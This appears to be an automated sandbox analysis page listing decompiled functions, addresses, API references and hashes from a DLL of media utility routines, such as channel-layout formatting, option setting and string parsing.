Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_createmv_logmv_malloczmv_realloc_f
String ID: Could not create the texture (%lx)$Static surface pool size exceeded.
API String ID: 22886632-350389734
Opcode ID: 12dea1e201e8f5d438329ade5418983e4152c6497013e786b6b6d990fad55280
Instruction ID: d0ee2a216646596517f8e2272bb6c8791eb02a2e11f7fe46a603028adb549b45
Opcode Fuzzy Hash: 12dea1e201e8f5d438329ade5418983e4152c6497013e786b6b6d990fad55280
Instruction Fuzzy Hash: 5C4188B5A087419FC744DF29C58061ABBE1FF88700F51896EF8999B316E774E984CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1000D684 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000D684(void* __edi) {
				void* _t75;

				while(1) {
					L16:
					__eax =  *(__edi + 8);
					__ebx = __ebp;
					__edx =  *(__edi + 0xc);
					__esp[4] =  *(__edi + 8);
					__esp[5] =  *(__edi + 0xc);
					while(1) {
						__esp[7] = __ebp;
						__eax = __esp[4];
						__ecx = 0;
						__edx = __esp[5];
						__ebp = __edi;
						do {
							L20:
							__edi = __edx;
							__esi = __eax;
							__esi = (__edi << 0x00000020 | __eax) >> __cl;
							__edi = __edi >> __cl;
							if((__cl & 0x00000020) != 0) {
								__esi = __edi;
							}
							__esi = __esi & 0x00000001;
							if(__esi == 0) {
								goto L19;
							}
							_t31 = __ebx - 1; // 0x0
							__esi = _t31;
							if(__ebx != 0) {
								__ebx = __esi;
								goto L19;
							}
							__edi = __ebp;
							__ebp = __esp[7];
							if(__ebp != 0) {
								__esp[4] = __ecx;
								__eax = 0x100b1acf;
								__esp[1] = 0x100b1acf;
								__eax = __esp[6];
								 *__esp = __esp[6];
								__eax = L100089C0();
								__ecx = __esp[4];
								L38:
								if(__ecx <= 0x28) {
									L26:
									__eax =  *(0x100b2280 + __ecx * 8);
									if(__eax == 0) {
										L32:
										__esp[2] = __ecx;
										__eax = __esp[6];
										__ebx = "USR%d";
										__esp[1] = "USR%d";
										 *__esp = __esp[6];
										__eax = L100089C0();
										L10:
										while(1) {
											L10:
											if( *__edi != 2) {
												L3:
												__esi =  *(__edi + 4);
												__ebp = __ebp + 1;
												if(__esi <= __ebp) {
													L14:
													if(__esi == 0) {
														__eax = 0;
														__esp[2] = 0;
														__eax = "%d channels";
														__esp[1] = "%d channels";
														__eax = __esp[6];
														 *__esp = __esp[6];
														L100089C0() = 0;
													} else {
														__eax = __esp[6];
														__edx = 0x100b1ad1;
														__esp[1] = 0x100b1ad1;
														 *__esp = __esp[6];
														L100089C0() = 0;
													}
													return _t75;
												}
												L4:
												if(__ebp >= __esi) {
													L42:
													__eax = 0x100b1acf;
													__esp[1] = 0x100b1acf;
													__eax = __esp[6];
													 *__esp = __esp[6];
													__eax = L100089C0();
													L9:
													__eax = __esp[6];
													__esi = "NONE";
													__esp[1] = "NONE";
													 *__esp = __esp[6];
													__eax = L100089C0();
													continue;
												}
												__eax =  *__edi;
												if(__eax == 2) {
													__edx =  *(__edi + 8);
													__eax = __ebp + __ebp * 2;
													__eax =  *(__edi + 8) + (__ebp + __ebp * 2) * 8;
													__ecx =  *( *(__edi + 8) + (__ebp + __ebp * 2) * 8);
													__ebx = __ecx - 0x400;
													if(__ebp != 0) {
														__esp[4] = __ecx;
														__eax = 0x100b1acf;
														__esp[1] = 0x100b1acf;
														__eax = __esp[6];
														 *__esp = __esp[6];
														__eax = L100089C0();
														__ecx = __esp[4];
													}
													if(__ebx > 0x3ff) {
														goto L38;
													}
													L36:
													__esp[2] = __ebx;
													__eax = "AMBI%d";
													__esp[1] = "AMBI%d";
													__eax = __esp[6];
													 *__esp = __esp[6];
													__eax = L100089C0();
													continue;
												}
												if(__eax == 3) {
													__eax =  *(__edi + 8);
													__edx =  *(__edi + 0xc);
													__esp[4] = __eax;
													__ebx = __eax;
													__ecx = __eax;
													__esp[5] =  *(__edi + 0xc);
													__eax >> 1 = __eax >> 0x00000001 & 0x55555555;
													__ecx = __eax - (__eax >> 0x00000001 & 0x55555555);
													__ebx = __ecx;
													__ecx = __ecx >> 2;
													__ebx = __ebx & 0x33333333;
													__ecx = __ecx & 0x33333333;
													__ecx =  &(__ecx[__ebx]);
													__ecx = __ecx >> 4;
													__ecx =  &(__ecx[__ecx >> 4]);
													__ecx = __ecx & 0x0f0f0f0f;
													__ebx =  &(__ecx[__ecx >> 8]);
													__ecx = __esp[5];
													__eax = __ebx;
													__ecx = __ecx >> 1;
													__ecx >> 1 = __ecx >> 0x00000001 & 0x55555555;
													__ecx = __ecx - (__ecx >> 0x00000001 & 0x55555555);
													__eax = __eax >> 0x10;
													__edx = __ecx;
													__ecx = __ecx >> 2;
													__edx = __edx & 0x33333333;
													__ecx = __ecx & 0x33333333;
													__ebx = (__eax >> 0x10) + __eax;
													__ecx =  &(__ecx[__edx]);
													__eax = (__eax >> 0x10) + __eax;
													__edx = __ecx;
													__eax = __eax & 0x0000003f;
													__edx = __ecx >> 4;
													__ecx =  &(__ecx[__ecx >> 4]);
													__ecx = __ecx & 0x0f0f0f0f;
													__ecx = __ecx >> 8;
													__ecx =  &(__ecx[__ecx >> 8]);
													__ecx = __ecx >> 0x10;
													__ebx =  &(__ecx[__ecx >> 0x10]);
													__ebx =  &(__ecx[__ecx >> 0x10]) & 0x0000003f;
													__ecx = __eax + ( &(__ecx[__ecx >> 0x10]) & 0x0000003f);
													__ebx = __ebp;
													__esi = __esi - __ecx;
													__ebx = __ebp - __esi;
													if(__ebp >= __esi) {
														__esp[7] = __ebp;
														__eax = __esp[4];
														__ecx = 0;
														__edx = __esp[5];
														__ebp = __edi;
														goto L20;
													}
													__ebx = 0;
													if(__ebp == 0) {
														goto L36;
													}
													__eax = 0x100b1acf;
													__ebx = __ebp;
													__esp[1] = 0x100b1acf;
													__eax = __esp[6];
													_t46 = __ebp + 0x400; // 0x401
													__ecx = _t46;
													__esp[4] = _t46;
													 *__esp = __esp[6];
													__eax = L100089C0();
													__ecx = __esp[4];
													if(__ebp <= 0x3ff) {
														goto L36;
													}
													goto L32;
												}
												if(__eax == 0) {
													goto L16;
												}
												if(__ebp != 0) {
													goto L42;
												}
												goto L9;
											}
											__edx =  *(__edi + 8);
											__eax = __ebp + __ebp * 2;
											__ecx = __edx + __eax * 8;
											if( *((char*)(__edx + 4 + __eax * 8)) == 0) {
												goto L3;
											}
											__eax = __esp[6];
											__ecx =  &(__ecx[4]);
											__ebp = __ebp + 1;
											__esp[2] = __ecx;
											__ecx = "@%s";
											__esp[1] = "@%s";
											 *__esp = __esp[6];
											__eax = L100089C0();
											__esi =  *(__edi + 4);
											if(__esi > __ebp) {
												goto L4;
											}
											goto L14;
										}
									}
									__esp[2] = __eax;
									__eax = "%s";
									__esp[1] = "%s";
									__eax = __esp[6];
									 *__esp = __esp[6];
									__eax = L100089C0();
									goto L10;
								}
								if(__ecx != 0xffffffff) {
									goto L32;
								}
								goto L9;
							}
							if(__ecx > 0x28) {
								goto L32;
							}
							goto L26;
							L19:
							__ecx =  &(__ecx[1]);
						} while (__ecx != 0x40);
						__edi = __ebp;
						__ebp = __esp[7];
						if(__ebp == 0) {
							goto L9;
						}
						goto L42;
					}
				}
			}

0x1000d688
0x1000d688
0x1000d688
0x1000d68b
0x1000d68d
0x1000d690
0x1000d694
0x1000d698
0x1000d698
0x1000d69c
0x1000d6a0
0x1000d6a2
0x1000d6a6
0x1000d6bc
0x1000d6bc
0x1000d6bc
0x1000d6be
0x1000d6c0
0x1000d6c3
0x1000d6c8
0x1000d6ca
0x1000d6ca
0x1000d6cc
0x1000d6d2
0x00000000
0x00000000
0x1000d6d4
0x1000d6d4
0x1000d6d9
0x1000d6b0
0x00000000
0x1000d6b0
0x1000d6db
0x1000d6dd
0x1000d6e3
0x1000d879
0x1000d87d
0x1000d882
0x1000d886
0x1000d88a
0x1000d88d
0x1000d892
0x1000d896
0x1000d899
0x1000d6f2
0x1000d6f2
0x1000d6fb
0x1000d800
0x1000d800
0x1000d804
0x1000d808
0x1000d80d
0x1000d811
0x1000d814
0x00000000
0x1000d620
0x1000d620
0x1000d623
0x1000d5d0
0x1000d5d0
0x1000d5d3
0x1000d5d6
0x1000d660
0x1000d662
0x1000d596
0x1000d8e3
0x1000d8e7
0x1000d8ec
0x1000d8f0
0x1000d8f4
0x1000d8fc
0x1000d668
0x1000d668
0x1000d66c
0x1000d671
0x1000d675
0x1000d67d
0x1000d67d
0x1000d57c
0x1000d57c
0x1000d5dc
0x1000d5de
0x1000d8be
0x1000d8be
0x1000d8c3
0x1000d8c7
0x1000d8cb
0x1000d8ce
0x1000d607
0x1000d607
0x1000d60b
0x1000d610
0x1000d614
0x1000d617
0x00000000
0x1000d617
0x1000d5e4
0x1000d5e9
0x1000d820
0x1000d823
0x1000d829
0x1000d82c
0x1000d82e
0x1000d834
0x1000d836
0x1000d83a
0x1000d83f
0x1000d843
0x1000d847
0x1000d84a
0x1000d84f
0x1000d84f
0x1000d859
0x00000000
0x00000000
0x1000d85b
0x1000d85b
0x1000d85f
0x1000d864
0x1000d868
0x1000d86c
0x1000d86f
0x00000000
0x1000d86f
0x1000d5f2
0x1000d720
0x1000d723
0x1000d726
0x1000d72a
0x1000d72c
0x1000d72e
0x1000d734
0x1000d73a
0x1000d73c
0x1000d73e
0x1000d741
0x1000d747
0x1000d74d
0x1000d751
0x1000d754
0x1000d756
0x1000d761
0x1000d763
0x1000d767
0x1000d76b
0x1000d76f
0x1000d775
0x1000d779
0x1000d77c
0x1000d77e
0x1000d781
0x1000d787
0x1000d78d
0x1000d78f
0x1000d791
0x1000d793
0x1000d795
0x1000d798
0x1000d79b
0x1000d79d
0x1000d7a5
0x1000d7a8
0x1000d7ac
0x1000d7af
0x1000d7b1
0x1000d7b4
0x1000d7b7
0x1000d7b9
0x1000d7bb
0x1000d7bf
0x1000d698
0x1000d69c
0x1000d6a0
0x1000d6a2
0x1000d6a6
0x00000000
0x1000d6a8
0x1000d7c5
0x1000d7c9
0x00000000
0x00000000
0x1000d7cf
0x1000d7d4
0x1000d7d6
0x1000d7da
0x1000d7de
0x1000d7de
0x1000d7e4
0x1000d7e8
0x1000d7eb
0x1000d7f6
0x1000d7fa
0x00000000
0x00000000
0x00000000
0x1000d7fa
0x1000d5f9
0x00000000
0x00000000
0x1000d601
0x00000000
0x00000000
0x00000000
0x1000d601
0x1000d625
0x1000d628
0x1000d631
0x1000d634
0x00000000
0x00000000
0x1000d636
0x1000d63a
0x1000d63d
0x1000d63e
0x1000d642
0x1000d647
0x1000d64b
0x1000d64e
0x1000d653
0x1000d658
0x00000000
0x00000000
0x00000000
0x1000d658
0x1000d620
0x1000d701
0x1000d705
0x1000d70a
0x1000d70e
0x1000d712
0x1000d715
0x00000000
0x1000d715
0x1000d8a2
0x00000000
0x00000000
0x00000000
0x1000d8a8
0x1000d6ec
0x00000000
0x00000000
0x00000000
0x1000d6b2
0x1000d6b2
0x1000d6b3
0x1000d8b0
0x1000d8b2
0x1000d8b8
0x00000000
0x00000000
0x00000000
0x1000d8b8
0x1000d698

APIs

mv_bprintf.F086 ref: 1000D64E
mv_bprintf.F086 ref: 1000D678
mv_bprintf.F086 ref: 1000D715

Strings

@%s, xrefs: 1000D642

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: @%s
API String ID: 3083893021-2921637043
Opcode ID: c4bd400a84f836f8168436f958854a5664bfff359e734bd969f61d6a5558c79a
Instruction ID: bde4f2789606c19ab050fa63e9045ae12eeb8ea4b86e9135c35405d0853ffa6a
Opcode Fuzzy Hash: c4bd400a84f836f8168436f958854a5664bfff359e734bd969f61d6a5558c79a
Instruction Fuzzy Hash: 89215A759097068BE310EF19C48026EF7E1FF88394F12892EE88897315E731ED44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 100310F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

mv_expr_parse_and_eval.F086 ref: 10031179

Part of subcall function 100177F0: mv_expr_parse.F086 ref: 10017862
Part of subcall function 100177F0: mv_expr_free.F086 ref: 100178D7
Part of subcall function 100177F0: mv_expr_free.F086 ref: 100178E6
Part of subcall function 100177F0: mv_expr_free.F086 ref: 100178F5
Part of subcall function 100177F0: mv_freep.F086 ref: 10017904
Part of subcall function 100177F0: mv_freep.F086 ref: 1001790C
Part of subcall function 100177F0: mv_expr_free.F086 ref: 10017926
Part of subcall function 100177F0: mv_expr_free.F086 ref: 10017935
Part of subcall function 100177F0: mv_expr_free.F086 ref: 10017944
Part of subcall function 100177F0: mv_freep.F086 ref: 10017953
Part of subcall function 100177F0: mv_freep.F086 ref: 1001795B

mv_d2q.F086 ref: 10031195
mv_reduce.F086 ref: 100311E9

Strings

%d:%d%c, xrefs: 1003110F

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_expr_free$mv_freep$mv_d2qmv_expr_parsemv_expr_parse_and_evalmv_reduce
String ID: %d:%d%c
API String ID: 3833080124-2624059611
Opcode ID: 85f5d36575807e7fafa94c670191ceb92a74355afdc239334235b21a28f3aeeb
Instruction ID: a95d822099c94071c5e8dd7deebf43e7e110092c234b0a376a52b2c466eaaf16
Opcode Fuzzy Hash: 85f5d36575807e7fafa94c670191ceb92a74355afdc239334235b21a28f3aeeb
Instruction Fuzzy Hash: 7B3156B59193419F8741DF29C58014AFBF1BF89681F458D2EF989DB321E7B0E9448B82

Uniqueness

Uniqueness Score: -1.00%

Function 1002C2B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 1002BDE3
mv_log.F086 ref: 1002BE0D
mv_log.F086 ref: 1002BEB1
mv_log.F086 ref: 1002C29B

Strings

%-15s , xrefs: 1002BDF4

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log$strcmp
String ID: %-15s
API String ID: 1163046698-755444208
Opcode ID: 67f8d91f5481be5a8abc9581b63586c4f7dabccb4f422c1acad020251f47d285
Instruction ID: a65aa5bdc326f2953bb7a34f6a4e1eb88b94763fe27593f8274a1ef2d068a0ee
Opcode Fuzzy Hash: 67f8d91f5481be5a8abc9581b63586c4f7dabccb4f422c1acad020251f47d285
Instruction Fuzzy Hash: 8E21B774A09B899FCB50CF29D5806AEB7E1FF88740F96881DF99887712D734EC408B42

Uniqueness

Uniqueness Score: -1.00%

Function 100315DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62stringCOMMON

Download Yara Rule

APIs

strtoul.MSVCRT ref: 10031526
strspn.MSVCRT ref: 100315F4
bsearch.MSVCRT ref: 1003162A
strtoul.MSVCRT ref: 10031694
mv_log.F086 ref: 10031758

Strings

0123456789ABCDEFabcdef, xrefs: 100315EB

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strtoul$bsearchmv_logstrspn
String ID: 0123456789ABCDEFabcdef
API String ID: 1580567553-1534423534
Opcode ID: c327318b04b43838116a0972af538bf9c9ae0042157bb8606ce20964d6a13b67
Instruction ID: 475c0a1212074f1c7d46960a65edae6006a24f871e4a86debb08d9146b8ed167
Opcode Fuzzy Hash: c327318b04b43838116a0972af538bf9c9ae0042157bb8606ce20964d6a13b67
Instruction Fuzzy Hash: 932180759087859FD752CFB4818139ABBF0EF892C1F45CA6EE4899F251D738C884CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10031200 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 1003122F

Strings

ntsc, xrefs: 10031201

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strcmp
String ID: ntsc
API String ID: 1004003707-2045543799
Opcode ID: c2f3f76b493e7ae363ef3bea34b35956eb32799f12b6245bb7e1ae69e1db444d
Instruction ID: 6cea7622dc21b0a8fdc9447b4567d31d915cfc657656d513b1a483a310e5b42b
Opcode Fuzzy Hash: c2f3f76b493e7ae363ef3bea34b35956eb32799f12b6245bb7e1ae69e1db444d
Instruction Fuzzy Hash: 5F112374A083029FD341CF69C4C069BBBE5EF89340F10896AF885CB361D774E996CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1002D115 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908

mv_log.F086 ref: 1002D191
mv_log.F086 ref: 1002D1CB

Strings

The value set by option '%s' is not an image size., xrefs: 1002D174
Invalid negative size value %dx%d for size '%s', xrefs: 1002D1BB

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_logstrcmp
String ID: Invalid negative size value %dx%d for size '%s'$The value set by option '%s' is not an image size.
API String ID: 3828882664-2712872533
Opcode ID: b31177d7786b4a561955791bd2828fcace0b00fc2088e4f3536eec9f814de66f
Instruction ID: 02b988b28a835c7d36fa6f9bea235d2f97bb535cbcd3440d1fa17c5a1276ff59
Opcode Fuzzy Hash: b31177d7786b4a561955791bd2828fcace0b00fc2088e4f3536eec9f814de66f
Instruction Fuzzy Hash: 8E21D078A087419FC700DF28E49095ABBF5FF89750F85886EF99987760D635EC41CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10032256 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

mv_small_strptime.F086 ref: 10032270
_errno.MSVCRT ref: 1003228D

Part of subcall function 10092440: _errno.MSVCRT ref: 100925F0

_errno.MSVCRT ref: 100322C6

Strings

%M:%S, xrefs: 10032264

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _errno$mv_small_strptime
String ID: %M:%S
API String ID: 1751681387-2500880230
Opcode ID: c3d908d13c1e039d41a5e226ac4ed468a27b5a4f753288add814200e358970ce
Instruction ID: 5da90234cc48fb51afaae1d0e0c7376ed52327f504ee9011e26ba8ee41a26718
Opcode Fuzzy Hash: c3d908d13c1e039d41a5e226ac4ed468a27b5a4f753288add814200e358970ce
Instruction Fuzzy Hash: 4D010871A09302CFD765DF29C84035FBBE0EB84341F11C82EE899CB220E7309945DB92

Uniqueness

Uniqueness Score: -1.00%

Function 1003024B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E1003024B(intOrPtr* __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr* __ebp, void* __fp0, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, char* _a40, intOrPtr _a44, char _a60) {
				intOrPtr* _t27;
				intOrPtr _t32;
				char* _t36;
				intOrPtr* _t40;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr* _t55;
				intOrPtr* _t58;
				void* _t64;

				_t64 = __fp0;
				_t55 = __ebp;
				_t52 = __esi;
				_t49 = __edi;
				_t40 = __ebx;
				while(1) {
					L6:
					_a12 = 0;
					_a8 = _a4;
					_a4 =  *_t55;
					_t36 =  &_a60;
					 *_t58 = _t36;
					_a40 = _t36;
					_t32 = E10011210(_t40, _t49, _t52, _t55);
					if(_t32 >= 0) {
						goto L1;
					} else {
						break;
					}
					while(1) {
						L1:
						_a8 = _t55;
						_a12 = 2;
						_a4 = 0x100b75dd;
						 *_t58 =  *_t40;
						_t27 = E100110D0();
						_t55 = _t27;
						if(_t27 == 0) {
							break;
						}
						_a12 = _t49;
						_a8 = _a4;
						 *_t58 = _t52;
						_a4 =  *_t55;
						_t32 = L1002F6A0(_t40, _t49, _t52, _t55, _t64);
						if(_t32 == 0xabafb008) {
							goto L6;
						} else {
							if(_t32 >= 0) {
								continue;
							} else {
								_a40 =  &_a60;
								L5:
								_a44 = _t32;
								_a16 = _a4;
								_a8 = "Error setting option %s to value %s.\n";
								_a4 = 0x10;
								 *_t58 = _t52;
								_a12 =  *_t55;
								E10026560();
								 *_t58 = _a40;
								L10011CC0();
								return _a44;
							}
						}
						L10:
					}
					 *_t58 = _t40;
					L10011CC0();
					 *_t40 = _a60;
					return 0;
					goto L10;
				}
				goto L5;
			}

0x1003024b
0x1003024b
0x1003024b
0x1003024b
0x1003024b
0x10030250
0x10030250
0x10030252
0x10030259
0x10030260
0x10030264
0x10030268
0x1003026b
0x1003026f
0x10030276
0x00000000
0x00000000
0x00000000
0x00000000
0x100301b0
0x100301b0
0x100301b0
0x100301be
0x100301c2
0x100301c8
0x100301cb
0x100301d2
0x100301d4
0x00000000
0x00000000
0x100301da
0x100301e1
0x100301e8
0x100301eb
0x100301ef
0x100301f9
0x00000000
0x100301fb
0x100301fd
0x00000000
0x100301ff
0x10030203
0x10030207
0x10030207
0x10030213
0x1003021f
0x10030223
0x10030227
0x1003022a
0x1003022e
0x10030237
0x1003023a
0x1003024a
0x1003024a
0x100301fd
0x00000000
0x100301f9
0x10030280
0x10030283
0x1003028c
0x10030297
0x00000000
0x10030297
0x00000000

APIs

mv_dict_get.F086 ref: 100301CB
mv_opt_set.F086 ref: 100301EF
mv_log.F086 ref: 1003022E
mv_dict_free.F086 ref: 1003023A
mv_dict_set.F086 ref: 1003026F

Strings

Error setting option %s to value %s., xrefs: 10030217

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
